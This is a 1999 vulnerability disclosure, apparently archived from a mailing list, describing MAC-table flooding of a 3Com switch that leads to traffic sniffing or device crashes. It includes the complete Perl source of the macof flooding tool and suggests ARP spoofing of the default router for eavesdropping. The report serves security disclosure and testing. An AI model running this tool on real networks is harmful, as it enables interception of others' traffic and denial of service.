Infosec Security Vulnerability Report
No: Infosec.19990305.macof.a
=====================================
Vulnerability Summary
---------------------
Problem: Due to limitation with ARP/MAC-tables;
switches could start sending packages to all ports,
other network devices could hang, crash or reboot
if they receive lots of MAC-addresses.
Threat: Someone could eavesdrop/sniff network connections
over a switched network.
Denial of service attacks on a local network.
Platform: Verified a 3com Superstack Switch 3300
(3c16981 Hardware v.1 Software v.2.10).
Very possible other network devices.
Solution: There is no today known solution to the problem.
Vulnerability Description
-------------------------
Senario:
Computer A talks with computer B.
Computer C is running macof.
Computer A, B and C are connected to the same 3com switch.
When running macof ( http://quake.skif.net/RawIP/macof.html ), a perl-program
included in the perl-module Raw:IP ( http://quake.skif.net/RawIP/ ), through a
3com Superstack Switch 3300 (3c16981 Hardware v.1 Software v.2.10) the switch
starts to send all network packages from computer A to computer B and computer
C.
Solution
--------
There is no today known solution to the problem.
As a workaround for switches you could maybe, where available, lock a
MAC-address to every port on the switch.
Background:
-----------
At DefCon VI there were discussions about switches. Some people acquire a switch
because you could not eavesdrop a network connection over it. Someone told that
if you send a special multicast to a switch you could spoof another switch and
thereby should the switch start sending you network packages. In these attempts
we discovered that you easily could spoof a MAC-address and thereby confuse a
switch because the switch tries to remember which MAC-addresses is on each port.
Because of some network packages goes to the spoofing MAC you get problems with
the connections (resends). But what happens if the switch gets flooded with
MAC-addresses? The switch just has a bound memory-space for the MAC-addresses on
each port. What happens if this table gets full? After a few tests (with macof)
we got different results depending on the brand of the switch. Some switches
stopped working and other started to forward network traffic to wrong or all
ports. The only scientific analysis is this one reported. This is a resource
problem.
3com was informed about this problem 21/4 1999.
macof is just one way to do it. We think that the best way to eavesdrop a
connection over a switch is to spoof the default router and send ARP-redirects
with your MAC-address as ?changing to? and route the incoming packages to the
default routers MAC-address.
//Ian Vitek
ian.vitekat_private
Test program, macof:
------
#!/usr/bin/perl -w
#
# macof v. 1.1
# By Ian Vitek ( ian.vitekat_private )
# Tests network devices by flooding local network with MAC-addresses.
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./macof -e <mac_of_def_gate> -n 1000000
# ./macof -r -n 1000000
# (run it several times)
#
# Warning: This program could cause serious problems on your network.
# This program could hang, crash or reboot network devices.
# Switches could start sending packages to all ports making it
# possible to intercept network traffic.
#
#
require 'getopts.pl';
use Net::RawIP;
Getopts('hvrs:e:d:x:y:i:n:');
sub GenMAC
{
my $tmp_mac="00";
my $i=0;
# generate random mac-address
while($i++ < 5) {
$tmp_mac.=":" . sprintf("%x",int rand 16);
$tmp_mac.=sprintf("%x",int rand 16);
}
return($tmp_mac);
}
$a = new Net::RawIP;
die "usage: $0 [options]\
\t-d dest_host\t\t(def:random)\
\t-s source_host\t\t(def:random)\
\t-v \t\t\tprints generated mac-addresses\
\t-r | -e dest_mac \trandomize or set destination mac address\
\t\t\t\tshould be in format ff:ff:ff:ff:ff:ff or host\
\t-x source_port\t\t(def:random)\
\t-y dest_port \t\t(def:random)\
\t-i interface \t\tset sending interface \t\t(def:eth0)\
\t-n times\t\tset number of times to send \t(def:1)\
\t-h this help\n" unless ( !$opt_h && !($opt_r && $opt_e) );
# set default values
$opt_i=eth0 unless $opt_i;
$opt_n=1 unless $opt_n;
$s_host=$opt_s if $opt_s;
$d_host=$opt_d if $opt_d;
$s_port=$opt_x if $opt_x;
$d_port=$opt_y if $opt_y;
# choose network card
if($opt_e) {
$a->ethnew($opt_i, dest => $opt_e);
} else {
$a->ethnew($opt_i);
}
# Loop
for($times=0; $times < $opt_n; $times++) {
# Check if one or two mac-addresses should be generated
$mac=&GenMAC;
if($opt_r) {
$d_mac=&GenMAC;
print "$d_mac \t$mac\n" if($opt_v);
# set mac-addresses
$a->ethset(source => $mac, dest => $d_mac);
} else {
print "$mac\n" if($opt_v);
# set mac-address
$a->ethset(source => $mac);
}
# generate random source and destination ip-addresses
$s_host=17000000+int rand 4261000000 unless $opt_s;
$d_host=17000000+int rand 4261000000 unless $opt_d;
# generate random source and dest ports
$s_port=int rand 65535 unless $opt_x;
$d_port=int rand 65535 unless $opt_y;
# set network package
$a->set({ip => {saddr => $s_host, daddr => $d_host},
tcp => {source => $s_port, dest => $d_port}
});
# send
$a->ethsend;
}
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:45:04 PDT